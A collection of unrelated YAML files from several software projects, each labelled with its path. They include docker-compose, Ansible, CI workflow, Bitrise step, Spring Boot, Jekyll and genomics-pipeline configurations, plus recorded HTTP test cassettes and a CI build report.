  celeryworker:
    # Inherit the django service definition; override image/name/command below.
    <<: *django
    image: django_pro1_iot_local_celeryworker
    container_name: django_pro1_iot_local_celeryworker
    depends_on:
      - redis
      - postgres
    # No HTTP port for celery; [] overrides the merged-in "8000:8000" mapping.
    ports: []
    command: /start-celeryworker
  celerybeat:
    <<: *django
    image: django_pro1_iot_local_celerybeat
    container_name: django_pro1_iot_local_celerybeat
    depends_on:
      - redis
      - postgres
    ports: []
    command: /start-celerybeat
  flower:
    <<: *django
    image: django_pro1_iot_local_flower
    container_name: django_pro1_iot_local_flower
    ports:
      - "5555:5555"
    command: /start-flower
|
local.yml
|
---
# End-to-end test for the content_view_version_cleanup role:
#   play 1 (localhost): create a test organization, a plain content view and a
#                       composite content view, each with five published versions
#   play 2 (tests):     run the cleanup role keeping 2 versions, then assert the result
#   play 3 (localhost): remove the test organization again
- hosts: localhost
  collections:
    - theforeman.foreman
  gather_facts: false
  vars_files:
    - vars/server.yml
  tasks:
    - name: ensure test organization
      include_tasks: tasks/organization.yml
      vars:
        organization_name: "Test Organization"
        organization_state: "present"
    - include_tasks: tasks/content_view.yml
      vars:
        content_view_name: "cleanup-testcv"
    - include_tasks: tasks/content_view.yml
      vars:
        content_view_name: "cleanup-testccv"
        composite: true
        components:
          - content_view: cleanup-testcv
            latest: true
    - include_tasks: tasks/content_view_version.yml
      vars:
        content_view_name: "cleanup-testcv"
        version: "{{ item }}"
      loop:
        - "1.0"
        - "2.0"
        - "3.0"
        - "4.0"
        - "5.0"
    - include_tasks: tasks/content_view_version.yml
      vars:
        content_view_name: "cleanup-testccv"
        version: "{{ item }}"
      loop:
        - "1.0"
        - "2.0"
        - "3.0"
        - "4.0"
        - "5.0"
- hosts: tests
  collections:
    - theforeman.foreman
  gather_facts: false
  vars_files:
    - vars/server.yml
  roles:
    - role: content_view_version_cleanup
      vars:
        username: "{{ foreman_username }}"
        password: "{{ <PASSWORD> }}"
        server_url: "{{ foreman_server_url }}"
        validate_certs: "{{ foreman_validate_certs }}"
        organization: "Test Organization"
        content_view_version_cleanup_keep: 2
        content_view_version_cleanup_search: "name ~ cleanup"
  post_tasks:
    - name: find remaining content view versions
      theforeman.foreman.resource_info:
        username: "{{ foreman_username }}"
        password: "{{ <PASSWORD> }}"
        server_url: "{{ foreman_server_url }}"
        validate_certs: "{{ foreman_validate_certs }}"
        organization: "Test Organization"
        resource: content_views
        search: "name ~ cleanup"
      register: remaining_cvs
    # NOTE(review): cleanup_keep is 2 yet 3 versions are expected to remain —
    # presumably a version still referenced (e.g. by the composite's "latest"
    # component) cannot be deleted; confirm against the role's documentation.
    - name: check remaining content view versions
      assert:
        that:
          - remaining_cvs.resources[0].versions|length == 3
          - remaining_cvs.resources[1].versions|length == 3
- hosts: localhost
  collections:
    - theforeman.foreman
  gather_facts: false
  vars_files:
    - vars/server.yml
  tasks:
    - name: remove test organization
      include_tasks: tasks/organization.yml
      vars:
        organization_name: "Test Organization"
        organization_state: "absent"
|
collections/ansible_collections/theforeman/foreman/tests/test_playbooks/content_view_version_cleanup_role.yml
|
# riboviz workflow configuration for the Mundodi et al. 2021 Candida albicans
# ribosome-profiling (RPF) dataset at 37C, using CDS annotations with 120 nt UTRs.
provenance:
  authors:
  - author: <NAME>
    email: <EMAIL>
    website:
  date run: 2021-06-01
  riboviz-version: 2.1beta | COMMIT f3e77ac58438d3bcc80b78fe78a58b75f0029633
  GEO: GSE154488
  reference: Global translational landscape of the Candida albicans morphological transition. G3 Genes|Genomes|Genetics 2021 Feb;11(2):jkaa043. Mundodi et. al.
  DOI: https://doi.org/10.1093/g3journal/jkaa043
  notes: Candida albicans RPF dataset at 37C (3 replicates)
adapters: AGATCGGAAGAGCACACGTCTGAACTCCAGTCA # Illumina sequencing adapter(s) to remove
aligner: hisat2 # Short read aligner to use. Currently only hisat2 works
buffer: 120 # Flanking-region buffer; presumably matches the 120 nt UTRs in the annotation file names — confirm against riboviz docs
asite_disp_length_file: data/yeast_standard_asite_disp_length.txt # Table of fixed A-site positions by read length
build_indices: TRUE # Build indices for aligner? if TRUE, remake indices from fasta files
cmd_file: Mundodi_Calbicans_riboviz.sh # Bash commands file
codon_positions_file: null # No codon positions file supplied for this run
count_reads: TRUE # Scan input, temporary and output files and produce counts of reads in each FASTQ, SAM, and BAM file processed?
count_threshold: 64 # Remove genes with a read count below this threshold, when generating statistics and figures
dataset: Mundodi_Calbicans_37C # Dataset name
dir_index: M-Ca_2021/index # Built indices directory
dir_in: M-Ca_2021/input # Input directory
dir_logs: M-Ca_2021/log # Log files directory
dir_out: M-Ca_2021/output # Output directory
dir_tmp: M-Ca_2021/tmp # Intermediate files directory
do_pos_sp_nt_freq: TRUE # Calculate position-specific nucleotide frequency?
extract_umis: FALSE # Extract UMIs if TRUE
group_umis: FALSE # Summarise UMI groups before and after deduplication, if TRUE
is_riboviz_gff: TRUE # Does the GFF file contain 3 elements per gene - UTR5, CDS, and UTR3
is_test_run: FALSE # Is this a test run
make_bedgraph: TRUE # Output bedgraph files, as TSV, in addition to h5?
max_read_length: 50 # Maximum read length in H5 output
min_read_length: 10 # Minimum read length in H5 output
features_file: null # No features file supplied for this run
# Input FASTQ files keyed by sample name (three 37C replicates per the notes above)
fq_files:
  37C1: SRR12228384.fastq.gz
  37C2: SRR12228385.fastq.gz
  37C3: SRR12228386.fastq.gz
num_processes: 16 # Number of processes to parallelize over
orf_fasta_file: ../example-datasets/fungi/candida/annotation/Candida_albicans_CDS_with_120utrs.fa # ORF file to align to
orf_gff_file: ../example-datasets/fungi/candida/annotation/Candida_albicans_CDS_with_120utrs.gff3 # GFF2/GFF3 file for ORFs
orf_index_prefix: calbicans_CDS # ORF index file prefix, relative to dir_index
primary_id: Name # Primary gene IDs to access the data (YAL001C, YAL003W, etc.)
rpf: TRUE # Is the dataset an RPF or mRNA dataset?
rrna_fasta_file: ../example-datasets/fungi/candida/contaminants/Candida_albicans_rRNA_tRNA.fa # rRNA file to avoid aligning to
rrna_index_prefix: calbicans_rRNA # rRNA index file prefix, relative to dir_index
secondary_id: NULL # Secondary gene IDs to access the data (COX1, EFB1, etc.)
stop_in_cds: FALSE # Are stop codons part of the CDS annotations in GFF?
t_rna_file: null # No tRNA file supplied for this run
|
fungi/candida/Mundodi_2021_RPF_37C_CDS_with_120utrs_config.yaml
|
# VCR-style HTTP cassette: recorded Vimeo oEmbed response used by
# test_get_oembed_data. Comments are ignored on replay; do not edit the
# recorded request/response data by hand.
interactions:
- request:
    body: null
    headers:
      Connection:
      - close
      Host:
      - vimeo.com
      User-Agent:
      - python-micawber
    method: GET
    uri: https://vimeo.com/api/oembed.json?format=json&maxheight=1080&maxwidth=1920&url=https%3A%2F%2Fvimeo.com%2F148751763
  response:
    body:
      string: '{"type":"video","version":"1.0","provider_name":"Vimeo","provider_url":"https:\/\/vimeo.com\/","title":"Rick
        Astley - Never Gonna Give You Up","author_name":"<NAME>","author_url":"https:\/\/vimeo.com\/user46726126","is_plus":"0","account_type":"basic","html":"<iframe
        src=\"https:\/\/player.vimeo.com\/video\/148751763?app_id=122963\" width=\"320\"
        height=\"240\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture\"
        allowfullscreen title=\"<NAME> - Never Gonna Give You Up\"><\/iframe>","width":320,"height":240,"duration":214,"description":"","thumbnail_url":"https:\/\/i.vimeocdn.com\/video\/547780029_295x166.jpg","thumbnail_width":295,"thumbnail_height":221,"thumbnail_url_with_play_button":"https:\/\/i.vimeocdn.com\/filter\/overlay?src0=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F547780029_295x166.jpg&src1=http%3A%2F%2Ff.vimeocdn.com%2Fp%2Fimages%2Fcrawler_play.png","upload_date":"2015-12-12
        19:51:18","video_id":148751763,"uri":"\/videos\/148751763"}'
    headers:
      Accept-Ranges:
      - bytes
      Access-Control-Allow-Headers:
      - X-Requested-With
      Access-Control-Allow-Origin:
      - '*'
      Age:
      - '0'
      Cache-Control:
      - no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Connection:
      - close
      Content-Length:
      - '982'
      Content-Security-Policy-Report-Only:
      - 'default-src https: data: blob: wss: ''unsafe-inline'' ''unsafe-eval''; report-uri
        /_csp'
      Content-Type:
      - application/json
      Date:
      - Thu, 18 Mar 2021 09:22:45 GMT
      Etag:
      - '"3d00955b438ddd10b764354ab9578e738318c3b7"'
      Last-Modified:
      - Thu, 18 Mar 2021 08:21:04 GMT
      Server:
      - nginx
      Strict-Transport-Security:
      - max-age=31536000; includeSubDomains; preload
      Vary:
      - Accept-Encoding
      Via:
      - 1.1 varnish, 1.1 varnish, 1.1 varnish
      X-BApp-Server:
      - pweb-v9157-nfxnf
      X-Cache:
      - MISS, MISS
      X-Cache-Hits:
      - 0, 0
      X-Content-Type-Options:
      - nosniff
      X-Frame-Options:
      - sameorigin
      X-Served-By:
      - cache-bwi5140-BWI, cache-cph20621-CPH
      X-Timer:
      - S1616059366.666689,VS0,VE133
      X-UA-Compatible:
      - IE=edge
      X-VServer:
      - infra-webproxy-a-9
      X-Varnish-Cache:
      - '0'
      X-Vimeo-DC:
      - ge
      X-XSS-Protection:
      - 1; mode=block
    status:
      code: 200
      message: OK
version: 1
|
saleor/graphql/core/tests/cassettes/test_get_oembed_data[https:/vimeo.com/148751763-VIDEO].yaml
|
# Jekyll site configuration for a personal portfolio/blog.
# NOTE: the original file declared `baseurl`, `url` and `syntax_highlighting`
# twice; duplicate keys are invalid YAML and most parsers silently keep the
# LAST value. The duplicates have been removed, keeping the values that
# previously won (baseurl: empty, url: http://localhost:4000/,
# syntax_highlighting: true).
title: <NAME>, BSc, MSc.
name: <NAME>
email: <EMAIL>
description: I am a Computer Science PhD student at the University of Exeter.
parallax_image_one: assets/images/startup3.jpg # These are the images used for the parallax background
parallax_image_two: assets/images/startup3.jpg
project_one: My PhD Project
project_one_description: My PhD involves the estimation of an object’s shape, reflectance and surface topography from photographs using machine learning and artificial intelligence approaches.
project_one_url: http://emps.exeter.ac.uk/computer-science/staff/mm757
project_one_icon: location_on
project_two: RTI Group at Exeter
project_two_description: The group in which I am a postgraduate student consists of a range of personnel from various disciplines including computer science, natural science and material science.
project_two_url: https://www.rtigroup.org/
project_two_icon: restaurant
project_three: Solar Eclipse TV Interview
project_three_description: I was contacted for an interview and asked to explain how to image the 2015 solar eclipse. I also discussed some astrophotography which I had posted online.
project_three_url: https://www.youtube.com/watch?v=VR57efH0Kfs&t=8s
project_three_icon: photo_camera
project_four: Photography
project_four_description: A few of my photographs
project_four_url: https://photos.app.goo.gl/JDyzvJJ9JCwH9u27A
project_four_icon: hotel
portfolio_heading: Research and Interests
portfolio_type: cards
# Skill icons from https://konpa.github.io/devicon/
#skills:
#Matlab, R, Python, C#, C++, Javascript, LabVIEW, Unity, Blender, Github.
icon_size: 50 # font-size of icons in px
colored: colored # Leave blank for black and white icons
project_button: SEE MORE
github: _
medium: _
baseurl: # if your site is located at /blog or /home, enter it here, otherwise leave it empty (an earlier duplicate set "/blog")
url: http://localhost:4000/ #the url of your site (an earlier duplicate set "")
google_analytics_tracking_id: UA-121110956-1
cookies_banner: none # The value "show" will show the cookies banner, the value "none" will hide the banner.
cookie_accept_message: Thanks!
syntax_highlighting: true # include the css for syntax highlighting
# Build settings
markdown: kramdown
# theme: minima
permalink: pretty
plugins:
  - jekyll-feed
  - jekyll-assets
  - jekyll-minifier
|
_config.yml
|
# Bitrise step definition: downloads (and optionally runs) a bash script
# stored in a private GitHub repository, authenticated with a personal
# access token.
# FIX: the input descriptions contained literal "\n" sequences inside
# `|` block scalars — block scalars do not process backslash escapes, so
# users saw the raw characters. Replaced with real blank lines.
title: GitHub Script Runner
summary: Downloads and Runs a bash script stored on a private GitHub repo.
description: |
  Downloads and Runs a bash script stored on a private GitHub repo.
  ### Configuring the Step
  Before using the step, you need to push your bash script into a private GitHub repository and set up a GitHub personal access token with read permission on the same repository.
  1. The "file raw path" param expects the full path of the script file
  "https://raw.githubusercontent.com/{owner}/{repo}/{branch}/{file}"
  2. The "run script" param indicates that the script should be run after the download
  "yes" to run the bash script and "no" to just download the raw file
  3. The "github access token" param must be a Bitrise Secret config
  ### Troubleshooting
  If the Step fails, check if the given GitHub Personal Access Token has read permission on the script's repository.
  ### Useful links
  https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token
website: https://github.com/AndersonLasak/bitrise-step-github-script-runner
source_code_url: https://github.com/AndersonLasak/bitrise-step-github-script-runner
support_url: https://github.com/AndersonLasak/bitrise-step-github-script-runner/issues
published_at: 2021-06-25T18:56:15.109701-03:00
source:
  git: https://github.com/AndersonLasak/bitrise-step-github-script-runner.git
  commit: a0f3739d2390b52a1e7aefdcad4f1a1db8489ce8
host_os_tags:
- osx-10.10
- ubuntu-16.04
type_tags:
- utility
toolkit:
  bash:
    entry_file: step.sh
deps:
  brew:
  - name: curl
is_requires_admin_user: false
is_always_run: false
is_skippable: false
run_if: ""
inputs:
- opts:
    description: |
      The path should contain the owner, repository, branch and filename with its extension, as follows:

      "https://raw.githubusercontent.com/{owner}/{repo}/{branch}/{file}"
    is_expand: true
    is_required: true
    title: The file raw path
    value_options: []
  raw_file_path: null
- opts:
    description: |
      Indicates if the downloaded file is a bash script that should be run, use "yes" to run the bash script and "no" to just download the raw file.
    is_expand: true
    is_required: true
    title: Field that says if the script should be run
    value_options:
    - "no"
    - "yes"
  run_script: "yes"
- github_access_token: null
  opts:
    description: |
      A personal access token is required to download the raw file via GitHub v3 API.

      For more information visit the official page:
      https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token
    is_expand: true
    is_required: true
    is_sensitive: true
    title: The personal access token from your GitHub account
    value_options: []
|
steps/github-script-runner/0.0.1/step.yml
|
# CI workflow: lint, compile and test every pull request, then auto-commit
# Prettier formatting back to the PR branch.
name: Continuous Integration
# This action works with pull requests
on:
  pull_request:
jobs:
  CI:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2
        with:
          # Make sure the actual branch is checked out when running on pull requests
          ref: ${{ github.head_ref }}
      - name: Setup Node.js
        uses: actions/setup-node@v2
        with:
          node-version: "16.x"
          cache: npm
      - name: Install Node modules
        run: npm ci
      - name: Lint
        run: npm run lint
      - name: Compile
        run: npm run compile
      - name: Unit Tests
        # NOTE(review): this env block is duplicated verbatim for the
        # integration tests below; GitHub Actions does not expand YAML
        # anchors, so consider hoisting these to job-level `env:` instead.
        env:
          MAINNET_URL: ${{ secrets.MAINNET_URL }}
          MNEMONIC_PHRASE: ${{ secrets.MNEMONIC_PHRASE }}
          USER_DEPLOYER_PRIVATE_KEY: ${{ secrets.USER_DEPLOYER_PRIVATE_KEY }}
          USER_TREASURY_PRIVATE_KEY: ${{ secrets.USER_TREASURY_PRIVATE_KEY }}
          USER_BOT_PRIVATE_KEY: ${{ secrets.USER_BOT_PRIVATE_KEY }}
          GOERLI_URL: ${{ secrets.GOERLI_URL }}
          KOVAN_URL: ${{ secrets.KOVAN_URL }}
        # Start a local node in the background, wait for it to boot, then run tests.
        run: |
          npm run node &
          echo 'Sleeping for 7 seconds...'
          sleep 7
          npm run test-unit
      - name: Integration Tests
        env:
          MAINNET_URL: ${{ secrets.MAINNET_URL }}
          MNEMONIC_PHRASE: ${{ secrets.MNEMONIC_PHRASE }}
          USER_DEPLOYER_PRIVATE_KEY: ${{ secrets.USER_DEPLOYER_PRIVATE_KEY }}
          USER_TREASURY_PRIVATE_KEY: ${{ secrets.USER_TREASURY_PRIVATE_KEY }}
          USER_BOT_PRIVATE_KEY: ${{ secrets.USER_BOT_PRIVATE_KEY }}
          GOERLI_URL: ${{ secrets.GOERLI_URL }}
          KOVAN_URL: ${{ secrets.KOVAN_URL }}
        run: |
          npm run node &
          echo 'Sleeping for 7 seconds...'
          sleep 7
          npm test
      - name: Prettify code
        run: npm run format
      - name: Commit changes
        # Pushes any formatting changes back to the PR branch.
        uses: stefanzweifel/git-auto-commit-action@v4
        with:
          commit_message: Prettified code!
          branch: ${{ github.head_ref }}
          commit_options: "--no-verify"
|
.github/workflows/build-workflow.yml
|
# VCR-style HTTP cassette for the Azure Storage SDK test
# test_container.test_list_blobs: creates a container, uploads two block
# blobs, then lists them. Comments are ignored on replay; do not edit the
# recorded request/response data by hand.
interactions:
- request:
    body: null
    headers:
      Connection: [keep-alive]
      Content-Length: ['0']
      User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
      x-ms-client-request-id: [893e0290-f4a9-11e6-b05e-64510640cc62]
      x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      x-ms-version: ['2016-05-31']
    method: PUT
    uri: https://storagename.blob.core.windows.net/containerc01c0c5d?restype=container
  response:
    body: {string: ''}
    headers:
      Date: ['Fri, 17 Feb 2017 00:39:26 GMT']
      ETag: ['"0x8D456CD6D83F7A1"']
      Last-Modified: ['Fri, 17 Feb 2017 00:39:27 GMT']
      Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
      Transfer-Encoding: [chunked]
      x-ms-request-id: [a6966097-0001-0041-1ab6-88cadf000000]
      x-ms-version: ['2016-05-31']
    status: {code: 201, message: Created}
- request:
    body: hello world
    headers:
      Connection: [keep-alive]
      Content-Length: ['11']
      User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
      x-ms-blob-type: [BlockBlob]
      x-ms-client-request-id: [89788764-f4a9-11e6-ac43-64510640cc62]
      x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      x-ms-version: ['2016-05-31']
    method: PUT
    uri: https://storagename.blob.core.windows.net/containerc01c0c5d/blob1
  response:
    body: {string: ''}
    headers:
      Content-MD5: [XrY7u+Ae7tCTyyK7j1rNww==]
      Date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      ETag: ['"0x8D456CD6D952A86"']
      Last-Modified: ['Fri, 17 Feb 2017 00:39:27 GMT']
      Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
      Transfer-Encoding: [chunked]
      x-ms-request-id: [a69660a1-0001-0041-22b6-88cadf000000]
      x-ms-request-server-encrypted: ['true']
      x-ms-version: ['2016-05-31']
    status: {code: 201, message: Created}
- request:
    body: hello world
    headers:
      Connection: [keep-alive]
      Content-Length: ['11']
      User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
      x-ms-blob-type: [BlockBlob]
      x-ms-client-request-id: [8987d5f6-f4a9-11e6-8ab7-64510640cc62]
      x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      x-ms-version: ['2016-05-31']
    method: PUT
    uri: https://storagename.blob.core.windows.net/containerc01c0c5d/blob2
  response:
    body: {string: ''}
    headers:
      Content-MD5: [XrY7u+Ae7tCTyyK7j1rNww==]
      Date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      ETag: ['"0x8D456CD6DA49420"']
      Last-Modified: ['Fri, 17 Feb 2017 00:39:27 GMT']
      Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
      Transfer-Encoding: [chunked]
      x-ms-request-id: [a69660a5-0001-0041-26b6-88cadf000000]
      x-ms-request-server-encrypted: ['true']
      x-ms-version: ['2016-05-31']
    status: {code: 201, message: Created}
- request:
    body: null
    headers:
      Connection: [keep-alive]
      User-Agent: [Azure-Storage/0.34.0 (Python CPython 3.5.2; Windows 10)]
      x-ms-client-request-id: [89978ec2-f4a9-11e6-b808-64510640cc62]
      x-ms-date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      x-ms-version: ['2016-05-31']
    method: GET
    uri: https://storagename.blob.core.windows.net/containerc01c0c5d?comp=list&restype=container
  response:
    body: {string: "\uFEFF<?xml version=\"1.0\" encoding=\"utf-8\"?><EnumerationResults
        ServiceEndpoint=\"https://storagename.blob.core.windows.net/\" ContainerName=\"containerc01c0c5d\"><Blobs><Blob><Name>blob1</Name><Properties><Last-Modified>Fri,
        17 Feb 2017 00:39:27 GMT</Last-Modified><Etag>0x8D456CD6D952A86</Etag><Content-Length>11</Content-Length><Content-Type>application/octet-stream</Content-Type><Content-Encoding
        /><Content-Language /><Content-MD5>XrY7u+Ae7tCTyyK7j1rNww==</Content-MD5><Cache-Control
        /><Content-Disposition /><BlobType>BlockBlob</BlobType><LeaseStatus>unlocked</LeaseStatus><LeaseState>available</LeaseState><ServerEncrypted>true</ServerEncrypted></Properties></Blob><Blob><Name>blob2</Name><Properties><Last-Modified>Fri,
        17 Feb 2017 00:39:27 GMT</Last-Modified><Etag>0x8D456CD6DA49420</Etag><Content-Length>11</Content-Length><Content-Type>application/octet-stream</Content-Type><Content-Encoding
        /><Content-Language /><Content-MD5>XrY7u+Ae7tCTyyK7j1rNww==</Content-MD5><Cache-Control
        /><Content-Disposition /><BlobType>BlockBlob</BlobType><LeaseStatus>unlocked</LeaseStatus><LeaseState>available</LeaseState><ServerEncrypted>true</ServerEncrypted></Properties></Blob></Blobs><NextMarker
        /></EnumerationResults>"}
    headers:
      Content-Type: [application/xml]
      Date: ['Fri, 17 Feb 2017 00:39:27 GMT']
      Server: [Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0]
      Transfer-Encoding: [chunked]
      Vary: [Origin]
      x-ms-request-id: [a69660ab-0001-0041-2cb6-88cadf000000]
      x-ms-version: ['2016-05-31']
    status: {code: 200, message: OK}
version: 1
|
tests/recordings/test_container.test_list_blobs.yaml
|
# Spring Boot configuration for the agile-base-server application:
# embedded server, Redis-backed sessions, Druid/MySQL datasource,
# ActiveMQ messaging and MyBatis-Plus ORM settings.
# (Original Chinese comments translated to English.)
server:
  port: 8080
  max-http-header-size: 100000
  servlet:
    session:
      timeout: 600
spring:
  application:
    name: agile-base-server
  session:
    # spring-session storage backend
    store-type: redis
  redis:
    # Redis database index (default is 0)
    database: 1
    hostName: localhost
    port: 6379
    # NOTE(review): empty value parses as null — confirm an unauthenticated
    # local Redis is intended here.
    password:
    timeout: 0
    general-config:
      min-idle: 1
      max-idle: 2
      max-total: 5
      max-wait: 30000
      test-on-borrow: true
      block-when-exhausted: true
      test-on-return: true
      test-on-create: true
      test-while-idle: true
      time-between-eviction-runs-millis: 60000
      min-evictable-idle-time-millis: 20000
      num-tests-per-eviction-run: 20000
    jedis:
      pool:
        # Maximum time to block waiting for a pooled connection (negative = unlimited)
        # NOTE(review): the value is empty (parses as null) — confirm the
        # intended "no limit" behaviour actually applies by default.
        max-wait:
        # Maximum number of idle connections in the pool
        max-idle: 8
        # Minimum number of idle connections in the pool
        min-idle: 0
  datasource:
    druid:
      url: jdbc:mysql://localhost:3306/mytest?allowMultiQueries=true&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&useSSL=false&allowPublicKeyRetrieval=true
      username: root
      password: <PASSWORD>
      # Number of physical connections created at initialization; initialization
      # happens on an explicit init() call or on the first getConnection()
      initial-size: 10
      # Minimum pool size
      min-idle: 10
      # Maximum pool size
      max-active: 20
      # Maximum wait time when acquiring a connection
      max-wait: 20000
      # Interval between eviction runs that close idle connections, in milliseconds
      time-between-eviction-runs-millis: 60000
      # Minimum time a connection may stay idle in the pool, in milliseconds
      min-evictable-idle-time-millis: 300000
      # SQL used to validate connections; differs per database
      validation-query: select 1
      # Recommended true; no performance impact and keeps connections safe. When a
      # connection is requested and has been idle longer than
      # timeBetweenEvictionRunsMillis, validationQuery is run to verify it is valid.
      test-while-idle: true
      # Run validationQuery when borrowing a connection; costs performance, but
      # recommended true here to avoid handing out dead connections
      test-on-borrow: true
      # Run validationQuery when returning a connection; costs performance
      test-on-return: false
      # Whether to cache preparedStatements (PSCache). PSCache greatly improves
      # performance on cursor-supporting databases such as Oracle. MySQL below
      # version 5.5 has no PSCache support, so disable it there; on 5.5+ the
      # monitoring UI shows cache-hit statistics, so it appears to be supported.
      # Enabling it also activates the per-connection PSCache size below.
      pool-prepared-statements: true
      max-pool-prepared-statement-per-connection-size: 20
      # Comma-separated plugin aliases. Common filters: "stat" for monitoring,
      # "log4j" for logging, "wall" for SQL-injection protection
      filters: stat,wall,log4j
      stat-view-servlet:
        login-username: druid
        login-password: <PASSWORD>
  http:
    encoding:
      charset: utf-8
      enabled: true
      force: true
  resources:
    # Resource cache period, in seconds (4 h)
    # NOTE(review): no cache-period value is actually set below — confirm
    # whether one was intended.
    chain:
      # Enable gzip compression
      # Enable caching
      cache: true
      compressed: true
    static-locations:
      - classpath:/resources/
      - file:/Users/reige/work/mapo-manage/
      - classpath:/META-INF/resources/
      - classpath:/META-INF/resources/webjars/
  activemq:
    broker-url: tcp://localhost:61616
    user: admin
    password: <PASSWORD>
    packages:
      trust-all: true
#mybatis
mybatis-plus:
  mapper-locations: classpath*:/mapper/**/*Mapper.xml
  # Entity scan; separate multiple packages with commas or semicolons
  typeAliasesPackage: com.example.demo.mapper
  global-config:
    # Database-related configuration
    db-config:
      # Primary-key type. AUTO: database auto-increment; INPUT: user-supplied id;
      # ID_WORKER: globally unique numeric id; UUID: globally unique UUID
      id-type: UUID
      # Field strategy. IGNORED: no check; NOT_NULL: non-null check;
      # NOT_EMPTY: non-empty check
      field-strategy: not_null
      # Camel-case to underscore conversion
      column-underline: true
      # Uppercase-with-underscores naming for database columns
      #capital-mode: true
      # Logical-delete configuration
      logic-delete-value: 0
      logic-not-delete-value: 1
      db-type: mysql
      # Hot-reload mappers — handy while debugging
      refresh: true
  # Native MyBatis configuration
  configuration:
    map-underscore-to-camel-case: true
    cache-enabled: false
#file-upload:
#  ## Upload directory; "/uploads/" is appended automatically
#  file-save-path: E://IDE//IDE//workspace//mapo-manage
#  template-path: E://IDE//IDE//workspace//mapo-manage//template
#  compress-height: 200
#  compress-width: 200
#  ffmpeg-home: /Users/reige/work/mapo-manage/doc/ffmpeg/bin
|
src/main/resources/application.yml
|
---
# Wilson CI build report for chef-server-12-trigger-ad_hoc run #52.
# Machine-generated pipeline record; values below are historical data.
result: SUCCESS
url: http://wilson.ci.chef.co/job/chef-server-12-trigger-ad_hoc/52/
timestamp: 2016-02-17 21:18:59 UTC
duration: 1h24m7s
triggered_by: jamesc
active_duration: 1h23m48s
parameters:
  GIT_REF: jc/743/nginx-hash_bucket_size-2
  EXPIRE_CACHE: false
change:
  git_remote: <EMAIL>:chef/chef-server.git
  # NOTE(review): "<PASSWORD>" is a redaction artifact — this field originally
  # held a commit SHA, not a password.
  git_commit: <PASSWORD>
  project: chef-server
  version: 12.4.2+20160217211913
# Per-stage results; build/test stages fan out into per-platform runs.
stages:
  chef-server-12-promote:
    result: SUCCESS
    url: http://wilson.ci.chef.co/job/chef-server-12-promote/58/
    duration: 0s
  chef-server-12-test:
    result: SUCCESS
    url: http://wilson.ci.chef.co/job/chef-server-12-test/96/
    duration: 50m31s
    runs:
      el-5:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=el-5,project=chef-server,role=tester/96/
        duration: 49m14s
      el-6:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=el-6,project=chef-server,role=tester/96/
        duration: 50m31s
      el-7:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=el-7,project=chef-server,role=tester/96/
        duration: 41m5s
      ubuntu-10.04:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=ubuntu-10.04,project=chef-server,role=tester/96/
        duration: 44m8s
      ubuntu-12.04:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=ubuntu-12.04,project=chef-server,role=tester/96/
        duration: 44m26s
      ubuntu-14.04:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-test/architecture=x86_64,platform=ubuntu-14.04,project=chef-server,role=tester/96/
        duration: 43m16s
  chef-server-12-build:
    result: SUCCESS
    url: http://wilson.ci.chef.co/job/chef-server-12-build/104/
    duration: 33m8s
    runs:
      el-5:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=el-5,project=chef-server,role=builder/104/
        duration: 32m58s
      el-6:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=el-6,project=chef-server,role=builder/104/
        duration: 22m6s
      el-7:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=el-7,project=chef-server,role=builder/104/
        duration: 22m36s
      ubuntu-10.04:
        result: SUCCESS
        url: http://wilson.ci.chef.co/job/chef-server-12-build/architecture=x86_64,platform=ubuntu-10.04,project=chef-server,role=builder/104/
        duration: 15m56s
  chef-server-12-trigger-ad_hoc:
    result: SUCCESS
    url: http://wilson.ci.chef.co/job/chef-server-12-trigger-ad_hoc/52/
    duration: 7s
|
reports/wilson.ci.chef.co/job/chef-server-12-trigger-ad_hoc/52.yaml
|
---
# Provision a CentOS kickstart/PXE boot server: install and configure dnsmasq
# (DHCP/TFTP/DNS), httpd, tftp, vsftpd and ntpd, then stage the CentOS Atomic
# ISO so clients can network-install from this host.
# Fixes: typo "prepate" in the last task name; the SELinux task was named
# "disable" although state=permissive only makes it non-enforcing; octal file
# modes quoted; canonical booleans.
- hosts: [kickstart]
  become: true
  handlers:
    - name: restart dnsmasq
      service: name=dnsmasq state=restarted
    - name: restart ntp
      service: name=ntpd state=restarted
    - name: restart httpd
      service: name=httpd state=restarted
  tasks:
    - name: install the required packages
      # More generic but since we know it is centos
      # package: name={{ item }} state=latest
      yum: name={{ item }} state=present
      with_items:
        - wget
        - httpd
        - tftp
        - tftp-server
        - vsftpd
        - syslinux
